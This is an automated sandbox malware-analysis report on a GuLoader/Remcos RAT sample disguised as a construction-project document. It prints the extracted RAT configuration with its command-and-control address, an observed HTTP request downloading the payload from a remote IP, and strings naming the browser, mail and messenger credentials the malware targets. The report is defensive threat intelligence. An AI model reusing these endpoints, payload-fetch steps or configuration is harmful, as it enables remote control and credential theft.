Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe

Overview

General Information

Sample name:Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
Analysis ID:1576192
MD5:92e917f439cc408828a0629d80fdb043
SHA1:ffcf08807371521fb40a31aff774e3275cd4338d
SHA256:6959fb446ee0634e6622e50f0f1b9367bffddf12f8083507cdc0ff39ed50abf4
Tags:exeuser-lowmal3
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Installs a global keyboard hook
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["162.251.122.87:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UOMZ21", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.2942457183.000000000019F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000000.00000002.1965807835.0000000004BAA000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe PID: 7504JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
              Click to see the 3 entries

              Sigma Signatures

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, ProcessId: 7864, TargetFilename: C:\ProgramData\remcos\logs.dat

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T16:18:50.616214+010020365941Malware Command and Control Activity Detected192.168.2.449737162.251.122.872404TCP
              2024-12-16T16:18:52.803573+010020365941Malware Command and Control Activity Detected192.168.2.449738162.251.122.872404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T16:18:53.084850+010028033043Unknown Traffic192.168.2.449739178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T16:18:45.335302+010028032702Potentially Bad Traffic192.168.2.44973666.63.187.3080TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["162.251.122.87:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UOMZ21", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Multi AV Scanner detection for submitted file
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeReversingLabs: Detection: 21%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2942457183.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe PID: 7864, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,5_2_00404423
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_00405814 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405814
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_004062CF FindFirstFileW,FindClose,0_2_004062CF
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_00402770 FindFirstFileW,4_2_00402770
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_00405814 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,4_2_00405814
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_004062CF FindFirstFileW,FindClose,4_2_004062CF
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,LdrInitializeThunk,lstrlenW,LdrInitializeThunk,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,4_2_332B10F1
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407EF8
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49737 -> 162.251.122.87:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49738 -> 162.251.122.87:2404
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorIPs: 162.251.122.87
              Source: global trafficTCP traffic: 192.168.2.4:49737 -> 162.251.122.87:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49739 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 66.63.187.30:80
              Source: global trafficHTTP traffic detected: GET /wBWcspgeBmkxYD199.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 66.63.187.30Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: global trafficHTTP traffic detected: GET /wBWcspgeBmkxYD199.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 66.63.187.30Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2967580790.0000000033280000.00000040.10000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000003.2220871776.000000000062D000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000003.2220824366.000000000062D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000003.2220871776.000000000062D000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000003.2220824366.000000000062D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: bhv4333.tmp.5.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhv4333.tmp.5.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2967335152.0000000033190000.00000040.10000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2967335152.0000000033190000.00000040.10000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2944475121.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.30/wBWcspgeBmkxYD199.bin
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.30/wBWcspgeBmkxYD199.bin_(
              Source: bhv4333.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv4333.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhv4333.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
              Source: bhv4333.tmp.5.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp;n-
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpG
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpw
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhv4333.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhv4333.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhv4333.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhv4333.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0Q
              Source: bhv4333.tmp.5.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://ocsp.msocsp.com0S
              Source: bhv4333.tmp.5.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: bhv4333.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhv4333.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000003.2205049456.000000000067D000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000003.2205077069.000000000067D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
